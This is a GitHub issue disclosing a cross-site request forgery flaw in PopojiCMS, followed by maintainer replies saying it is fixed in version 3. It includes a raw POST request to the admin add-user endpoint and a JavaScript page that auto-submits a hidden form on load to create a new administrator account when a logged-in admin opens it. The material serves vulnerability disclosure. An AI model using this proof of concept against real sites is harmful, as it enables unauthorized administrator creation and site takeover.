Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
POST /PopojiCMS/po-admin/route.php?mod=user&act=addnew HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/PopojiCMS/po-admin/admin.php?mod=user&act=addnew Content-Type: application/x-www-form-urlencoded Content-Length: 127 Connection: close Cookie: _ga=GA1.1.1523573753.1550292454; PHPSESSID=ebgi7l1qb4hi7jaun2rf98qej7 Upgrade-Insecure-Requests: 1
username=admin&nama_lengkap=admin123&password=admin123&repeatpass=admin123&email=eugene%40addbug.cn&no_telp=12342123412&level=1
username=zjh&nama_lengkap=zjh666&password=admimn123&repeatpass=admin123&email=zjh%40baidu.com&no_telp=12345678910&level=1
Write a POST script
Sent to the site owner, he created an administrator account by opening the link
The text was updated successfully, but these errors were encountered:
Terima kasih untuk temuan ini. Kami sebagai pengembang akan segera memperbaiki masalah ini di versi berikutnya.
Sorry, something went wrong.
Sudah diperbaiki pada versi 3
@DwiraSurvivor is version 3 released? I don't see a tag for it in this repo. Can you link to the fixing commit as well please? Thanks!
No branches or pull requests
POST /PopojiCMS/po-admin/route.php?mod=user&act=addnew HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/PopojiCMS/po-admin/admin.php?mod=user&act=addnew
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Connection: close
Cookie: _ga=GA1.1.1523573753.1550292454; PHPSESSID=ebgi7l1qb4hi7jaun2rf98qej7
Upgrade-Insecure-Requests: 1
username=admin&nama_lengkap=admin123&password=admin123&repeatpass=admin123&email=eugene%40addbug.cn&no_telp=12342123412&level=1
username=zjh&nama_lengkap=zjh666&password=admimn123&repeatpass=admin123&email=zjh%40baidu.com&no_telp=12345678910&level=1
Write a POST script

<script type="text/javascript"> function post(url,fields) { var p =document.createElement("form"); p.action= url; p.method="POST"; p.target="_self"; p.innerHTML = fields; document.body.appendChild(p); p.submit(); } function attack() { var fields; fields += ""; fields += ""; fields += ""; fields += ""; var url="http://127.0.0.1 /PopojiCMS/po-admin/route.php?mod=user&act=addnew"; post(url,fields); } window.onload = function() { attack();} </script>Sent to the site owner, he created an administrator account by opening the link
The text was updated successfully, but these errors were encountered: